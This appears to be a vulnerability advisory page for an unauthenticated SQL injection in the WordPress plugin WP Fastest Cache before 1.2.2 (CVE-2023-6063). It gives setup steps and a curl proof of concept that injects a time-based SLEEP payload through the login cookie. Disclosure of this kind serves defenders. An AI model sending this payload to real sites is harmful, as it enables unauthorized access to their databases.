Lucene search
Alex SanfordWPEX-ID:30A74105-8ADE-4198-ABE2-1C6F2967443EHistoryNov 13, 2023 - 12:00 a.m.
WP Fastest Cache < 1.2.2 - Unauthenticated SQL Injection
2023-11-1300:00:00
Alex Sanford
39
wp fastest cache
vulnerability
unauthenticated
sql injection
curl command
Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
1. Visit WP Fastest Cache > Settings. Ensure "Cache System" is enabled, and "Logged-in Users" is disabled. Click "Submit" at the bottom.
2. The following curl command demonstrates the SQLi:
curl https://example.com -H "Cookie: wordpress_logged_in=1234%22%20AND%20(SELECT%202537%20FROM%20(SELECT(SLEEP(5)))Sazm)%20AND%20%22qzts%22=%22qzts"Related
prion
prion
Sql injection
2023-12-04 22:15:00
cvelist
cvelist
CVE-2023-6063 WP Fastest Cache < 1.2.2 - Unauthenticated SQL Injection
2023-12-04 21:29:41
zdt
zdt
WordPress WP Fastest Cache 1.2.2 SQL Injection Vulnerability
2024-02-28 00:00:00
cve
cve
CVE-2023-6063
2023-12-04 22:15:08
nvd
nvd
CVE-2023-6063
2023-12-04 22:15:08
packetstorm
packetstorm
WordPress WP Fastest Cache 1.2.2 SQL Injection
2024-02-28 00:00:00
nuclei
nuclei
WP Fastest Cache 1.2.2 - SQL Injection
2024-01-14 13:20:23
wpvulndb
wpvulndb
WP Fastest Cache < 1.2.2 - Unauthenticated SQL Injection
2023-11-13 00:00:00
openvas
openvas
WordPress Fastest Cache Plugin < 1.2.2 SQLi Vulnerability
2023-11-17 00:00:00
exploitdb
exploitdb
WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection
2024-02-28 00:00:00
wordfence
wordfence
8.2 High
AI Score
Confidence
Low
0.03 Low
EPSS
Percentile
91.0%
Related for WPEX-ID:30A74105-8ADE-4198-ABE2-1C6F2967443E